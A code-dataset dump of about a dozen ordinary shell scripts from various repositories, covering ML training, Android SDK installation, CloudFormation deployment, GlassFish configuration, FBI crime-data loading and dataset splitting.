blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
5e0d5f409e04d286878c43feb01928df385ff923
|
Shell
|
sjoon-oh/dlrm-debloat
|
/train_kaggle.sh
|
UTF-8
| 1,110
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# DLRM Facebookresearch Debloating
# author: sjoon-oh @ Github
# source: dlrm/our_train.py
dlrm_pt_bin="python3 dlrm_run.py"
dataset_base_dir="dataset"
dataset_dir="${dataset_base_dir}/Kaggle"
dataset_proc_base_dir="dataset-processed"
dataset_proc_dir="${dataset_proc_base_dir}/Kaggle"
if [ ! -d ${dataset_dir} ]; then
mkdir ${dataset_base_dir}
mkdir ${dataset_dir}
fi
if [ ! -d ${dataset_proc_dir} ]; then
mkdir ${dataset_proc_base_dir}
mkdir ${dataset_proc_dir}
fi
echo "run script (pytorch) ..."
$dlrm_pt_bin \
--arch-sparse-feature-size=16 \
--arch-mlp-bot="13-512-256-64-16" \
--arch-mlp-top="512-256-1" \
--raw-data-file="${dataset_dir}/train.txt" \
--processed-data-file="${dataset_proc_dir}/kaggle.npz" \
--loss-function=bce \
--round-targets=True \
--learning-rate=0.1 \
--mini-batch-size=128 \
--print-freq=1024 \
--test-freq=16384 \
--print-time \
--test-mini-batch-size=16384 \
--test-num-workers=2 \
--save-model="model/model-kaggle.pt" \
--den-feature-num=13 \
--cat-feature-num=26
echo "done"
| true
|
1ac43d1e6130a2a8546dbc385d49f37d6bae9b1b
|
Shell
|
theneva/pqrs.org
|
/themes/update.sh
|
UTF-8
| 423
| 3.1875
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
set -u
basedir=$(dirname $0)
cd $basedir
pwd=$(pwd)
rm -fr docsy
git clone --recursive --shallow-submodules --depth 1 https://github.com/google/docsy.git
rm -f docsy-revisions
for d in $(find docsy -name '.git'); do
echo -n "$d: " >> docsy-revisions
(cd $(dirname $d) && git rev-parse HEAD) >> docsy-revisions
done
for d in $(find docsy -name '.git'); do
rm -fr $d
done
rm -fr docsy/userguide
| true
|
dc5ff76476671e330172dbad8c7638091ad9342f
|
Shell
|
gleandroj/docker-laravel
|
/scripts/android.sh
|
UTF-8
| 3,303
| 2.890625
| 3
|
[] |
no_license
|
export SDK_HOME=/opt
apt-get --quiet update --yes
apt-get --quiet install --yes wget tar unzip lib32stdc++6 lib32z1 git --no-install-recommends
# Gradle
export GRADLE_VERSION=4.1
export GRADLE_SDK_URL=https://services.gradle.org/distributions/gradle-${GRADLE_VERSION}-bin.zip
curl -sSL "${GRADLE_SDK_URL}" -o gradle-${GRADLE_VERSION}-bin.zip \
&& unzip gradle-${GRADLE_VERSION}-bin.zip -d ${SDK_HOME} \
&& rm -rf gradle-${GRADLE_VERSION}-bin.zip
export GRADLE_HOME=${SDK_HOME}/gradle-${GRADLE_VERSION}
export PATH=${GRADLE_HOME}/bin:$PATH
# android sdk|build-tools|image
export ANDROID_TARGET_SDK="android-28" \
ANDROID_BUILD_TOOLS="27.0.3" \
ANDROID_SDK_TOOLS="3859397" \
ANDROID_IMAGES="sys-img-armeabi-v7a-android-28,sys-img-armeabi-v7a-android-28"
export ANDROID_SDK_URL=https://dl.google.com/android/repository/sdk-tools-linux-${ANDROID_SDK_TOOLS}.zip
curl -sSL "${ANDROID_SDK_URL}" -o android-sdk-linux.zip \
&& unzip android-sdk-linux.zip -d ${SDK_HOME}/android-sdk \
&& rm -rf android-sdk-linux.zip
# Set ANDROID_HOME
export ANDROID_HOME=${SDK_HOME}/android-sdk
export PATH=${ANDROID_HOME}/tools:${ANDROID_HOME}/platform-tools:$PATH
# licenses
mkdir $ANDROID_HOME/licenses
echo 8933bad161af4178b1185d1a37fbf41ea5269c55 > $ANDROID_HOME/licenses/android-sdk-license
echo d56f5187479451eabf01fb78af6dfcb131a6481e >> $ANDROID_HOME/licenses/android-sdk-license
echo 24333f8a63b6825ea9c5514f83c2829b004d1fee >> $ANDROID_HOME/licenses/android-sdk-license
echo 84831b9409646a918e30573bab4c9c91346d8abd > $ANDROID_HOME/licenses/android-sdk-preview-license
# Update and install using sdkmanager
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "tools" "platform-tools"
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "build-tools;${ANDROID_BUILD_TOOLS}"
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "platforms;${ANDROID_TARGET_SDK}"
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "extras;android;m2repository" "extras;google;google_play_services" "extras;google;m2repository"
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "extras;m2repository;com;android;support;constraint;constraint-layout;1.0.2"
echo yes | $ANDROID_HOME/tools/bin/sdkmanager "extras;m2repository;com;android;support;constraint;constraint-layout-solver;1.0.2"
# android ndk
export ANDROID_NDK_VERSION=r16b
export ANDROID_NDK_URL=http://dl.google.com/android/repository/android-ndk-${ANDROID_NDK_VERSION}-linux-x86_64.zip
curl -L "${ANDROID_NDK_URL}" -o android-ndk-${ANDROID_NDK_VERSION}-linux-x86_64.zip \
&& unzip android-ndk-${ANDROID_NDK_VERSION}-linux-x86_64.zip -d ${SDK_HOME} \
&& rm -rf android-ndk-${ANDROID_NDK_VERSION}-linux-x86_64.zip
export ANDROID_NDK_HOME=${SDK_HOME}/android-ndk-${ANDROID_NDK_VERSION}
export PATH=${ANDROID_NDK_HOME}:$PATH
chmod u+x ${ANDROID_NDK_HOME}/ -R
# Android CMake
wget -q https://dl.google.com/android/repository/cmake-3.6.3155560-linux-x86_64.zip -O android-cmake.zip
unzip -q android-cmake.zip -d ${ANDROID_HOME}/cmake
export PATH=${PATH}:${ANDROID_HOME}/cmake/bin
chmod u+x ${ANDROID_HOME}/cmake/bin/ -R
rm -rf android-cmake.zip
#android-wait-for-emulator
#curl https://raw.githubusercontent.com/Cangol/android-gradle-docker/master/android-wait-for-emulator -o ${SDK_HOME}/bin/android-wait-for-emulator
#chmod u+x ${SDK_HOME}/bin/android-wait-for-emulator
| true
|
e786b9b79d42864f8d309fe7fe3fadb56937a954
|
Shell
|
koert/spring-petclinic
|
/configure-petclinic.sh
|
UTF-8
| 811
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
SCRIPT=$(readlink -f "$0")
bin_dir=$(dirname "$SCRIPT")
root_dir=${bin_dir}/..
# Print error message and exit 1
# message - error message
fail() {
echo $1
exit 1
}
# Call asadmin command
# args - arguments
cmdAsAdmin() {
echo "* asadmin $@"
asadmin --user admin --passwordfile ${root_dir}/config/admin-password $* || fail "asadmin command failed"
}
echo "=> Start Glassfish server"
asadmin start-domain
echo "=> Create datasource"
cmdAsAdmin create-jdbc-connection-pool --restype=javax.sql.DataSource --datasourceclassname=org.hsqldb.jdbc.JDBCDataSource \
--property "user=sa:password=sa:url=jdbc\:hsqldb\:hsql\:mem\:petclinic" \
PetClinicPool
cmdAsAdmin create-jdbc-resource --connectionpoolid PetClinicPool jdbc/petclinic
echo "=> Stop Glassfish server"
asadmin stop-domain
| true
|
dd3afa2d6dd0c868557dbeab8213c09213e66a83
|
Shell
|
bohunicka14/Linux-scripts
|
/heslo.sh
|
UTF-8
| 564
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
heslo=$1
echo $heslo
if [ ${#heslo} -le 5 ]
then
echo Kratke heslo
fi
if [[ $heslo =~ [0-9] && $heslo =~ [a-z] && $heslo =~ [A-Z] ]]
then
echo Heslo je OK
else
echo Heslo nie je OK
fi
#==================================================================
heslo=$(pwgen 12 1)
heslo=$(date +%s | md5sum)
heslo=$(date +%s | sha256sum)
heslo=$(date +%s | sha256sum | base64)
heslo=$(date +%s | sha256sum | base64 | head -c 18)
echo $heslo
hash=$(htpasswd -bnBC 10 "" $heslo)
echo $hash
# od -An -N8 -to8 /dev/urandom | sha256sum | base64 | head -c 18
| true
|
d69c18a850b00f7b4ef06cd748242fd46d8ad1ea
|
Shell
|
jinyx728/CS229
|
/data_generation/script/process-subdiv.sh
|
UTF-8
| 661
| 2.90625
| 3
|
[] |
no_license
|
######################################################################
# Copyright 2019. Yongxu Jin.
# This file is part of PhysBAM whose distribution is governed by the license contained in the accompanying file PHYSBAM_COPYRIGHT.txt.
######################################################################
#!/bin/sh
# cloth model path
PREDICT_NEW_PATH=/phoenix/yxjin/test_infer/mocap_13_30
OUTDIR=/phoenix/yxjin
mkdir $OUTDIR/mocap_13_30_subdiv/
for INDEX in $(seq -f "%08g" 0 495)
do
python subdivision.py -i $PREDICT_NEW_PATH/$INDEX.obj -o $OUTDIR/mocap_13_30_subdiv/pd_div_${INDEX}_tex.obj -t ../vt_groundtruth.txt
echo "generated data $INDEX"
done
| true
|
922c69c0943d067bccc3ae0f8f1eec3b7b47a025
|
Shell
|
maxxtepper/bin
|
/root/rsbak_v2
|
UTF-8
| 12,480
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/bash
# Script to back up the home directory using rsync
# COMPLETE: This is to do a complete backup. The procedure will simply create a new directory
# dated with the current time and do a full backup of the /home/maxx/
#============================================================================================================
################################## Variables #########################################################
#============================================================================================================
# _complete : /backup/rsync/home/maxx/_home_maxx.$_NOW.complete
# _complete_parent: /backup/rsync/home/maxx/_home_maxx.$_NOW.complete/_home_maxx.$_NOW.parent
# The complete_parent directory will be created independent of anything else when a complete backup is desired
# _partial: $_complete/_home_maxx.$_NOW
# The partial directory will be created, but inside of the most recent complete directory, and linked to the parent directory
# in that complete directory
# Read the file in parameter and fill the array named "array"
getArray() {
array=() # Create array
while IFS= read -r line; do # Read a line
array+=("$line") # Append line to the array
done < "$1"
}
# Call the function on the pre-defined file and name and scheme
getArray "config_rsbak.txt"
# Print the file (print each element of the array
for e in "${array[@]}"; do
echo "$e"
done
# IMPORTANT NOTE
# I am going to write a script that runs this script for multiple systems at scheduled times and days, with a specific scheme in mind: a complete will be done every 30 days, and a partial is day everyday there is not a complete. Then, a full complete, with all of its partial data, can be compressed and stored for long-term use.
_NOW=$(date +"%y%m%d_%H%M%S")
# Read in, from a file, names for what to backup...
_HOME_IN=$array[1]
# ...and where to back it up
_HOME_COM=$array[2]
# The ID
_HOME_ID=$array[3]
_bak_in=
_bak_com=
_bak_id=
_complete=
_complete_parent=
# To setup the backup
_bak_type=
_bak_log=
# For excludes
_HOME_EXC="$_HOME_COM/.excludes.txt"
_bak_exc_tmp=
_bak_exc=
_incomplete=
_destination=
#============================================================================================================
################################## Functions ##########################################################
#============================================================================================================
rsync_backup() {
eval _bak_in=\$${1}_IN
eval _bak_com=\$${1}_COM
eval _bak_id=\$${1}_ID
eval _bak_exc_tmp=\$${1}_EXC
echo "_bak_com set to $_bak_com"
}
find_complete() {
ls_array=( $(find $_bak_com/_* -maxdepth 0 -type d) )
ls_last=${#ls_array[@]}
_complete=${ls_array[$ls_last -1]}
# Echo out complete for _bak_com
echo "$_complete"
}
find_complete_parent() {
ls_array=( $(find $_bak_com/_*.parent -maxdepth 0 -type d) )
ls_last=${#ls_array[@]}
_complete_parent=${ls_array[$ls_last -1]}
echo "$_complete_parent"
}
rsync_type() {
_bak_type=$1
if [ $_bak_type = "partial" ]; then
_complete=$(find_complete)
_bak_com=$_complete
_complete_parent=$(find_complete_parent)
echo "_complete_parent=$_complete_parent"
echo "rsync_type --> partial"
elif [ $_bak_type = "complete" ]; then
_bak_com=$_bak_com/"$_bak_id"."$_NOW".complete
echo "rsync_type --> complete"
fi
_bak_exc="$_bak_com/excludes"
_bak_log="$_bak_com/log_files"
}
check_directory() {
# Check to see if a directory exists
# echo "check_directory got $1"
if [ -d "$1" ]; then
echo "yes"
else
echo "no"
fi
}
rsync_prep() {
# Check complete or partial
# ~~~~~COMPLETE~~~~~
if [ "$_bak_type" = "complete" ]; then
# Prepare final names for directories and files
_incomplete=$_bak_com/"$_bak_id".incomplete
_destination=$_bak_com/"$_bak_id"."$_NOW".parent
_complete_parent=$_bak_com
echo "_incomplete=$_incomplete"
echo "_destination=$_destination"
# Make neccassarry directories
echo "Making directory $_incomplete"
sudo mkdir -p "$_incomplete"
# sudo chmod 755 $_bak_com
echo "Making directory $_bak_com"
sudo mkdir -p "$_bak_com"
# sudo chmod 755 $_bak_com
echo "Making directory $_bak_log"
sudo mkdir -p "$_bak_log"
# sudo chmod 755 $_bak_log
_bak_log=$_bak_log/"$_bak_id"_"$_NOW.log"
echo "Making directory $_bak_exc"
sudo mkdir -p "$_bak_exc"
# sudo chmod 755 $_bak_exc
_bak_exc=$_bak_exc/"$_bak_id"_"$_NOW"_excludes.txt
echo "_bak_exc=$_bak_exc"
if [ -f $_bak_exc_tmp ]; then
echo "_bak_exc_tmp exists!!: $_bak_exc_tmp"
fi
echo "Copying excludes.txt into excludes"
sudo cp $_bak_exc_tmp $_bak_exc
# ~~~~~PARTIAL~~~~~
elif [ "$_bak_type" = "partial" ]; then
# Look for necessary directories to make sure they exist
echo "Sending _bak_com=$_bak_com to check_directory"
if [ "$(check_directory $_bak_com)" = "yes" ]; then
echo "Found $_bak_com?.....yes"
else
echo "Found $_bak_com?.....no"
usage 2
exit 1
fi
if [ "$(check_directory "$_bak_log")" = "yes" ]; then
echo "Found $_bak_log?.....yes"
_bak_log=$_bak_log/"$_bak_id"_"$_NOW".log
else
echo "Found $_bak_log?.....no"
usage 2
exit 1
fi
if [ "$(check_directory "$_bak_exc")" = "yes" ]; then
echo "Found $_bak_exc?.....yes"
_bak_exc=$_bak_exc/"$_bak_id"_"$_NOW"_excludes.txt
else
echo "Found $_bak_exc?.....no"
usage 2
exit 1
fi
echo "Copying excludes.txt into excludes"
sudo cp $_bak_exc_tmp $_bak_exc
# Prepare final names for directories and files
_incomplete=$_bak_com/"$_bak_id".incomplete
_destination=$_bak_com/"$_bak_id".$_NOW
fi
}
rsync_commence() {
# Now make the backup
echo "The backup is being made"
#rsync --archive --info=progress2 --one-file-system --hard-links --human-readable --inplace --numeric-ids --delete --delete-excluded --log-file=$_bak_log --exclude-from=$_bak_exc --link-dest=$_complete_parent $_bak_in $_incomplete
rsync --archive --recursive --compress --info=progress2 --one-file-system --links --perms --executability --hard-links --times --human-readable --inplace --numeric-ids --delete --delete-excluded --log-file=$_bak_log --exclude-from=$_bak_exc --link-dest=$_complete_parent $_bak_in $_incomplete
# After completion
sudo mv $_incomplete $_destination
}
usage() {
case $1 in
1 ) echo "rsbak [-what] [-type]"
echo "-what ---> -r | --run == make backup from config file"
echo "-type ---> -c | --complete == do a fresh complete backup"
echo " -p | --partial == do a partial backup to the last complete backup"
echo "example: rsbak --run --complete"
;;
2 ) echo "some directory did not exist...possible no complete exists? Try running a complete backup"
;;
esac
}
#============================================================================================================
################################## Main ###############################################################
#============================================================================================================
while [ "$1" != "" ]; do
case $1 in
-r | --run ) shift
rsync_backup "_HOME"
;;
-c | --complete ) shift
rsync_type "complete"
;;
-p | --partial ) shift
rsync_type "partial"
;;
* ) usage
exit 1
esac
done
if [[ -n $_bak_type && -n $_bak_in ]]; then
echo "preparing rsync..."
rsync_prep $_bak_type
echo "rsync commencing: $_bak_type backup of $_bak_in"
rsync_commence
else
echo "Parameters not met!"
usage 1
exit 1
fi
echo "Backup complete!"
#===================================================================================================================================================================
#rsync --archive --one-file-system --hard-links --human-readable --inplace --numeric-ids --delete --delete-excluded --log-file="$_log_file" --exclude-from="$_excludes" --link-dest="$_complete_parent" "$_bak_what_name" "$_incomplete"
#===================================================================================================================================================================
# rsync: the command for using rsync
# --archive: This causes rsync to backup (they call it "preserve) things like file permissions, ownerships, and timestamps
# --one-file-system: This causes rsync to NOT recurse into the file systems. If you use this like I do then you must backup each file system (mount point) one at a time. The alternative is to simply backup / and exlude things you don't want to backup (like /proc, /sys, /tmp, and any network or removable media mounts)
# --hard-links: This causes rsync to maintain hard links that are on the server being backed up. This has nothing to do with the hard links used during the rotation
# --human-readable: This tells rsync to output numbers of bytes with K, M, G, or T suffices instead of just long strings of digits
# --inplace: This tells rsync to update files on the target at the block level instead of building a temporary replacement file. It id s dignificsnt performance improvement however it should not be used for things other than backups or if your version of rsync is old enough that --inplace is incompatbile with --link-dest
# --numerical-ids: This tells rsync to not attempt to translate UID <> userid or GID <> groupid. This is very important when doing backups and restores. If you are doing a restore from a live cd such as SystemRescueCD or Knoppix your file ownershi[s will be completely screwed up if you leave this out
# --delete: This tells rsync to delete files that are no longer on the server from the backup. This is less important when using --link-dest because you should be backing up to an empty directory so there would be nothing to delete however I include it because of the possibility that the *.incomplete directory I am backing up to is actually left over from a previous failed run and may have things to delete
# --delete-excluded: This tells rsync that it can delete stuff from a previous backup that is now within the excluded list
# --exclude-from=excludes.txt: This is a plain text files with a list of paths that I do not want backed up. The format of the file is simply one path per line. I tend to add things that will always be changing but are unimportant such as unimportant log and temp files. If you have a ~./gvfs entry you should add it too as it will cause a non-fatal error
# --link-dest: This is the most recent complete backup that was current when we started. We are telling rsync to link to this backup for any files that have not changed
# /home/maxx/: This is the path on the server that is to be backed up. Note that the trailing slash IS significant
# /backup/rsync/maxx/_home_maxx.incomplete/: This is the empty directory we are going to backup to. It should be created with mkdir -p first. If the directory exists from a previous failed or aborted backup it will simply be completed. This trailing slash is not significant but I prefer to have it
# --verbose: This causes rsync to list each file that it touches
# --progress: This addes to the verbosity and tells rsync to print out a %completion and transfer speed while transferring each file
# --itemize-changes: This adds to the file list a string of characters that explains why rsync believes each file needs to be touched. See the man page for the explination of the characters
| true
|
870b0e2ccebcaaf39ce6041cff2fa1fa11165f04
|
Shell
|
AndrewCopeland/conjur-api-go
|
/package.sh
|
UTF-8
| 417
| 3.34375
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash -e
echo "==> Packaging..."
rm -rf output/dist && mkdir -p output/dist
tar --exclude='./.git' --exclude='./output' -cvzf ./output/dist/conjur-api-go.tar.gz .
# # Make the checksums
echo "==> Checksumming..."
cd output/dist
if which sha256sum; then
sha256sum * > SHA256SUMS.txt
elif which shasum; then
shasum -a256 * > SHA256SUMS.txt
else
echo "couldn't find sha256sum or shasum"
exit 1
fi
| true
|
eb9c99ec6c9650d95345f3e667e039092544d9eb
|
Shell
|
green-delver/sh-files
|
/menü.sh
|
UTF-8
| 256
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
echo "1: x"
echo "2: y"
read ANTWORT
if [ "$ANTWORT" == "1" ]
then
clear
#Befehl
#
exit
fi
if [ "$ANTWORT" == "2" ]
then
clear
#Befehl
#
exit
fi
echo "Tastatureingabe nicht im erlaubten Bereich!"
| true
|
9cfc1f3e03a4ed69af34a29e77f9c1b80bbfe6f1
|
Shell
|
rkferreira/aws
|
/cloudformation/cloudformation.sh
|
UTF-8
| 4,925
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
#####################################
## Deploy cloudformation templates
#
REGION="eu-usa-1"
PROFILE="default"
AWSCLI="/usr/local/bin/aws"
TEMPLATES_PATH="./"
deploy_all () {
if [[ ! -z ${DEPLOY_ALL} ]]; then
if [[ -z ${YES_TO_ALL} ]]; then
read -p "I will deploy ALL stacks, are you sure? (y/n)" -n 1 -r
echo
if [[ $REPLY =~ [Yy]$ ]]; then
YES_TO_ALL='y'
else
YES_TO_ALL=''
fi
fi
if [[ ! -z ${YES_TO_ALL} ]]; then
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/base/${ENV_NAME}-networkstack.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/base/${ENV_NAME}-networkstack.yaml --stack-name ${ENV_NAME}-networkstack
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-securitygroups.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-securitygroups.yaml --stack-name ${ENV_NAME}-securitygroups
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-iam.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-iam.yaml --stack-name ${ENV_NAME}-iam --capabilities "CAPABILITY_IAM" "CAPABILITY_NAMED_IAM"
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-bastion.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/security/${ENV_NAME}-bastion.yaml --stack-name ${ENV_NAME}-bastion
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/db/${ENV_NAME}-database.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/db/${ENV_NAME}-database.yaml --stack-name ${ENV_NAME}-database
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-beanstalk-restdataapi.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-beanstalk-restdataapi.yaml --stack-name ${ENV_NAME}-beanstalk-restdataapi
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-apigw.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-apigw.yaml --stack-name ${ENV_NAME}-apigw
echo ""
echo "File: ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-apigw-vpclink.yaml"
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${TEMPLATES_PATH}${ENV_NAME}/application/${ENV_NAME}-apigw-vpclink.yaml --stack-name ${ENV_NAME}-apigw-vpclink --capabilities "CAPABILITY_IAM" "CAPABILITY_NAMED_IAM"
fi
fi
}
deploy_stack() {
if [[ ! -z ${STACK_NAME} && ! -z ${FILE_NAME} ]]; then
if [[ -z ${YES_TO_ALL} ]]; then
read -p "I will deploy ${FILE_NAME} with stack name as ${STACK_NAME}, are you sure? (y/n)" -n 1 -r
echo
if [[ $REPLY =~ [Yy]$ ]]; then
YES_TO_ALL='y'
else
YES_TO_ALL=''
fi
fi
if [[ ! -z ${YES_TO_ALL} ]]; then
${AWSCLI} --region ${REGION} --profile ${PROFILE} cloudformation deploy --template-file ${FILE_NAME} --stack-name ${STACK_NAME}
fi
fi
}
show_help () {
echo "USAGE:"
echo ""
echo " # Deploy a stack as STACKNAME getting resources from FILENAME"
echo " $0 -s STACKNAME -f FILENAME"
echo ""
echo " # Deploy ALL the files for the environment ENVNAME"
echo " $0 -a -e ENVNAME"
echo ""
echo " Add -y for NO confirmation on deployment."
echo " ENVNAME is part of file path on this directory structure."
echo ""
echo "Script defaults:"
echo " - REGION: ${REGION}"
echo " - PROFILE: ${PROFILE}"
echo " - TEMPLATES PATH: ${TEMPLATES_PATH}"
echo ""
echo "You MUST have aws cli configured and working BEFORE trying using this."
echo ""
}
#########
## Main
#
STACK_NAME=''
ENV_NAME=''
FILE_NAME=''
DEPLOY_ALL=''
YES_TO_ALL=''
while getopts 'yhs:e:f:a' opt; do
case ${opt} in
h)
show_help
exit 0
;;
s)
STACK_NAME="$OPTARG"
;;
e)
ENV_NAME="$OPTARG"
;;
f)
FILE_NAME="$OPTARG"
;;
y)
YES_TO_ALL="y"
;;
a)
DEPLOY_ALL="y"
;;
esac
done
if [[ ! -z ${DEPLOY_ALL} && ! -z ${ENV_NAME} ]]; then
echo ""
echo "Starting deploy ALL for env [ ${ENV_NAME} ] <<--"
deploy_all
fi
if [[ ! -z ${STACK_NAME} && ! -z ${FILE_NAME} ]]; then
echo ""
echo "Starting deploy of [ ${FILE_NAME} ] for stack [ ${STACK_NAME} ] in [ ${REGION} ] "
echo ""
deploy_stack
fi
exit 0
| true
|
7608abe53ed5f1bcda63d77ec246387af05d9be4
|
Shell
|
kobeld/editorpro
|
/scripts/run_on_dev_for_editorpro.sh
|
UTF-8
| 730
| 2.984375
| 3
|
[] |
no_license
|
export GOPATH=/home/ubuntu/gopkg
export GOROOT=/usr/local/go
APPROOT="$GOPATH/src/github.com/kobeld/editorpro/"
echo "======= updating pandoc code ========"
cd $GOPATH/src/github.com/kobeld/gopandoc
git checkout master && git pull origin master
if [[ $? != 0 ]] ; then exit 1; fi
echo "======= updating editorpro code ========"
cd $APPROOT
git checkout master && git pull origin master
if [[ $? != 0 ]] ; then exit 1; fi
echo "======= installing editorpro ======="
cd $APPROOT
$GOROOT/bin/go install .
if [[ $? != 0 ]] ; then exit 1; fi
echo "======= killing editorpro ======="
sudo killall editorpro;
echo $?
echo "======= restarting editorpro ======="
cd $APPROOT
sudo nohup $GOPATH/bin/editorpro >> ~/editorpro.log 2>&1 &
| true
|
54c25fc9e4f8282e30a142eeed15452c08cfae2c
|
Shell
|
narayana-glassbeam/quarks
|
/scripts/connectors/iotf/runiotfsensors.sh
|
UTF-8
| 536
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
quarks=../../..
# Runs IBM Watson IoT Plaform sample.
#
# runiotfsensors.sh path/device.cfg
#
# e.g. runiotfsensors.sh $HOME/device.cfg
#
# This connectors to your IBM Watson IoT Platform service
# as the device defined in the device.cfg.
# The format of device.cfg is the standard one for
# IBM Watson IoT Platform and a sample is in this directory
# (omitting values for the authorization tokens).
export CLASSPATH=${quarks}/samples/lib/quarks.samples.connectors.jar
java quarks.samples.connectors.iotf.IotfSensors $1
| true
|
b4af1faaffd18ec7d92f91d8601e0db562dfb804
|
Shell
|
azrosen92/fbi-crime-data
|
/dl-all-2018
|
UTF-8
| 957
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/bash
[ ! -d data/2018 ] && mkdir data/2018
# No download available for NC, NY, Alaska, California, Florida, Nevada,
# and Wyoming
STATES=(AL AR AK CO CT DE DC GA HA ID IL IN IA KS KY LA ME MD MA MI MN MS MO MT
NE NH NM ND OH OK OR PA RI SC SD TN TX UT VT VA WA WV WI)
for state in "${STATES[@]}"; do
echo "Downloading data for ${state}"
curl \
-o 2018-${state}.zip \
http://s3-us-gov-west-1.amazonaws.com/cg-d4b776d0-d898-4153-90c8-8336f86bdfec/2018/${state}-2018.zip
echo "Unzipping retrieved data"
tar xvf 2018-${state}.zip -C data/2018/
echo "Removing zip file"
rm ./2018-${state}.zip
if [[ $(psql -lqt | cut -d \| -f 1 | grep $DB_NAME) ]]; then
(cd data/2018/${state} && psql -d $DB_NAME -f ./postgres_setup.sql)
fi
echo "Copying data for ${state} into database"
(cd data/2018/${state}/ && psql -d $DB_NAME -f ./postgres_load.sql)
echo "Removing raw data for ${state}"
rm -rf data/2018/${state}
done
| true
|
888fca6006e3d54eab303a48274df845c3f5764f
|
Shell
|
elm-conf/cfp
|
/script/create-db.sh
|
UTF-8
| 316
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
initdb data
# start DB but clean it up when we're done
foreman start db &
DB=$!
finish() {
kill $DB
}
trap finish EXIT
# now create the database
sleep 1
createdb -e cfp
psql -d cfp -c "CREATE ROLE postgraphile LOGIN PASSWORD 'dev';"
psql -d cfp -c "ALTER USER postgraphile WITH SUPERUSER;"
| true
|
41d704e731684d58856b523d25b60645d40f80e5
|
Shell
|
mosconi/inf2980
|
/trab1/run3_all.sh
|
UTF-8
| 300
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/sh
cd datasets
for i in n*.bz2; do
echo -n "$i"
for j in 0 1 2 3 4 5 6 7 8 9; do
echo -n " $j"
[ -f ../results/${i}.output_3_${j} ] && continue
python2.7 ../run3.py ${i} > ${i}.output_3_${j}
mv ${i}.output_3_${j} ../results/
done
echo " done"
done
| true
|
65bd07d7eaf397b75787cd34c8776fa9614743c9
|
Shell
|
imansaleh16/GroupingStackOverflowTags
|
/split_data.sh
|
UTF-8
| 1,594
| 3.40625
| 3
|
[
"MIT"
] |
permissive
|
# Splits data into train, dev, and test (60%, 20%, 20%). This split is not used per se because we ended up needing two splits, so we used train and dev and test combined.
# Example: input: data/Posts_Subset.xml_combined_mallet, output in data folder: MetaData_mallet_*, Posts_mallet_*, Tags_mallet_*, Titles_mallet_*
file=$1
wc -l $file > data/temp
read lines file < data/temp
echo "lines=$lines"
rm data/temp
train=$((((lines*60)+99)/100))
test=$((((lines-train)+1)/2))
dev=$((lines-(train+test)))
echo "train=$train, test=$test, dev=$dev"
java -cp "libs/xmlparser/*:libs/stanford/*:bin" textutils.TextProcessor split $file $train
java -cp "libs/xmlparser/*:libs/stanford/*:bin" textutils.TextProcessor split "${file}_" $test
mv "${file}_${train}" "data/Posts_mallet_train"
mv "${file}__${test}" "data/Posts_mallet_test"
mv "${file}__" "data/Posts_mallet_dev"
rm "${file}_"
o_file=$file
file=$(sed -e "s/combined/titles/g" <<< $o_file)
echo "${file}_${test}"
mv "${file}_${train}" "data/Titles_mallet_train"
mv "${file}__${test}" "data/Titles_mallet_test"
mv "${file}__" "data/Titles_mallet_dev"
rm "${file}_"
file=$o_file
file=$(sed -e "s/combined/tags/g" <<< $file)
echo "${file}_${train}"
mv "${file}_${train}" "data/Tags_mallet_train"
mv "${file}__${test}" "data/Tags_mallet_test"
mv "${file}__" "data/Tags_mallet_dev"
rm "${file}_"
file=$o_file
